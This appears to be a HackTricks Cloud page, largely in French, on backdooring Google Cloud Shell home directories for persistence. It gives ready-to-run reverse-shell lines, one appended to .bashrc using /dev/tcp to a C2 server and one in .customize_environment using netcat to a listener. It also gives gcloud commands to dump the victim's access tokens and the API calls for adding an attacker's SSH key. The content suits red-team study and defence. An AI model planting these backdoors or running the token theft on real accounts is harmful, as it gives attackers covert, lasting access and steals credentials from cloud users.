GCP - Cloud Shell Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Cloud Shell

Pour plus d'informations, consultez :

GCP - Cloud Shell Enum

Backdoor Persistante

Google Cloud Shell vous fournit un accès en ligne de commande à vos ressources cloud directement depuis votre navigateur sans aucun coût associé.

Vous pouvez accéder à Google Cloud Shell depuis la console web ou en exécutant gcloud cloud-shell ssh.

Cette console a des capacités intéressantes pour les attaquants :

Tout utilisateur Google ayant accès à Google Cloud a accès à une instance Cloud Shell entièrement authentifiée (les Comptes de Service peuvent, même en étant Propriétaires de l'organisation).
Cette instance maintiendra son répertoire personnel pendant au moins 120 jours si aucune activité n'a lieu.
Il n'y a aucune capacité pour une organisation de surveiller l'activité de cette instance.

Cela signifie essentiellement qu'un attaquant peut mettre une backdoor dans le répertoire personnel de l'utilisateur et tant que l'utilisateur se connecte au GC Shell au moins tous les 120 jours, la backdoor survivra et l'attaquant obtiendra un shell chaque fois qu'il sera exécuté simplement en faisant :

echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc

Il y a un autre fichier dans le dossier personnel appelé .customize_environment qui, s'il existe, sera exécuté à chaque fois que l'utilisateur accède au cloud shell (comme dans la technique précédente). Il suffit d'insérer la porte dérobée précédente ou une comme celle-ci pour maintenir la persistance tant que l'utilisateur utilise "fréquemment" le cloud shell :

#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash

Il est important de noter que la première fois qu'une action nécessitant une authentification est effectuée, une fenêtre d'autorisation contextuelle apparaît dans le navigateur de l'utilisateur. Cette fenêtre doit être acceptée avant que la commande puisse s'exécuter. Si une fenêtre contextuelle inattendue apparaît, cela pourrait susciter des soupçons et potentiellement compromettre la méthode de persistance utilisée.

Ceci est la fenêtre contextuelle résultant de l'exécution de gcloud projects list depuis le cloud shell (en tant qu'attaquant) vue dans la session utilisateur du navigateur :

Cependant, si l'utilisateur a activement utilisé le cloudshell, la fenêtre contextuelle n'apparaîtra pas et vous pouvez rassembler les tokens de l'utilisateur avec :

gcloud auth print-access-token
gcloud auth application-default print-access-token

Comment la connexion SSH est établie

Fondamentalement, ces 3 appels API sont utilisés :

https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey [POST] (vous fera ajouter votre clé publique que vous avez créée localement)
https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start [POST] (vous fera démarrer l'instance)
https://content-cloudshell.googleapis.com/v1/users/me/environments/default [GET] (vous indiquera l'IP du google cloud shell)

Mais vous pouvez trouver plus d'informations dans https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key

Références

Apprenez et pratiquez le Hacking AWS :HackTricks Training AWS Red Team Expert (ARTE) Apprenez et pratiquez le Hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)

Soutenir HackTricks

Vérifiez les plans d'abonnement !
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez nous sur Twitter 🐦 @hacktricks_live.
Partagez des astuces de hacking en soumettant des PRs aux HackTricks et HackTricks Cloud dépôts github.

PreviousGCP - Cloud Run Persistence NextGCP - Cloud SQL Persistence

Last updated 1 month ago